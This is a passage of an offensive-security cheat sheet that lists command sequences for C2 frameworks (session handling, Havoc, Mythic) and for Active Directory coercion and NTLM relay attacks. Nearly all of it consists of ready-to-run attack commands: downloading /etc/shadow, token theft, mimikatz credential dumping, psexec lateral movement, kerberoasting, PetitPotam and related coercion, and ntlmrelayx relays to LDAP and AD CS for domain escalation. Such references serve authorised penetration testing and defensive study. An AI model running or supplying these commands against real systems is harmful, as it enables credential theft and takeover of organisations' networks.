https --lhost 0.0.0.0 --lport 443 --domain legitimate.com
 
# Session interaction
sessions                         # List sessions
use <session-id>                 # Interact
info                             # System info
ps                               # Processes
upload /tmp/linpeas.sh /tmp/     # Upload file
download /etc/shadow             # Download file
 
# Privilege escalation & lateral movement
getsystem                        # Attempt SYSTEM
impersonate                      # Token impersonation
psexec -t <target> -u user -p pass -d domain
 
# SOCKS proxy
socks5 start --port 1080
 
# Execute .NET assemblies (Rubeus, SharpHound, etc.)
armory install rubeus
execute-assembly /path/to/Rubeus.exe kerberoast

Havoc

bash
# Build
git clone https://github.com/HavocFramework/Havoc.git && cd Havoc && make
sudo ./havoc server --profile profiles/havoc.yaotl -v
./havoc client
 
# Demon agent commands (via GUI)
shell whoami                     # Shell command
upload / download                # File transfer
token steal <PID>                # Token impersonation
token make <user> <pass>         # Create token
mimikatz logonpasswords          # Credential dump
psexec <target> <command>        # Lateral movement
inline-execute /path/to/bof.o    # BOF execution

Mythic

bash
# Install
git clone https://github.com/its-a-feature/Mythic.git && cd Mythic
sudo ./mythic-cli install && sudo ./mythic-cli start
 
# Install agents
sudo ./mythic-cli install github https://github.com/MythicAgents/apollo      # Windows
sudo ./mythic-cli install github https://github.com/MythicAgents/poseidon    # Linux/Mac
 
# Install C2 profiles
sudo ./mythic-cli install github https://github.com/MythicC2Profiles/http
 
# Web UI: https://localhost:7443
# Agents managed via browser

12. Coercion Techniques

Automated Coercion

bash
# Coercer — 12+ methods in one tool
pip install coercer
coercer scan -t $TARGET -u user -p pass -d domain.com           # Scan for vulnerable methods
coercer coerce -t $TARGET -l $LISTENER -u user -p pass -d domain.com  # Trigger coercion
 
# NetExec all-in-one
nxc smb $TARGET -u user -p pass -M coerce_plus

Individual Techniques

bash
# PetitPotam (MS-EFSR) — unauthenticated possible
python3 PetitPotam.py $LISTENER $TARGET                         # Unauthenticated
python3 PetitPotam.py -u user -p pass -d domain.com $LISTENER $TARGET
 
# PrinterBug / SpoolSample (MS-RPRN)
python3 printerbug.py domain/user:pass@$TARGET $LISTENER
 
# DFSCoerce (MS-DFSNM) — authenticated only
python3 dfscoerce.py -u user -p pass -d domain.com $LISTENER $TARGET
 
# ShadowCoerce (MS-FSRVP)
python3 shadowcoerce.py -u user -p pass -d domain.com $LISTENER $TARGET

Relay Setup (run BEFORE coercion)

bash
# Relay to LDAP (for RBCD)
ntlmrelayx.py -t ldap://$DC --delegate-access --escalate-user 'EVIL$'
 
# Relay to AD CS HTTP enrollment (ESC8)
ntlmrelayx.py -t http://$CA/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
 
# Relay to LDAP for shadow credentials
ntlmrelayx.py -t ldap://$DC --shadow-credentials --shadow-target '$TARGET$'

Coercion Reference

| Technique | Interface | Auth Required | Service Needed |
|---|---|---|---|
| PetitPotam | MS-EFSR | No (patched) / Yes | EFS |
| PrinterBug | MS-RPRN | Yes | Print Spooler |
| DFSCoerce | MS-DFSNM | Yes | DFS Namespaces |
| ShadowCoerce | MS-FSRVP | Yes | File Server VSS Agent |
| WSPCoerce | MS-WSP | Yes | Windows Search |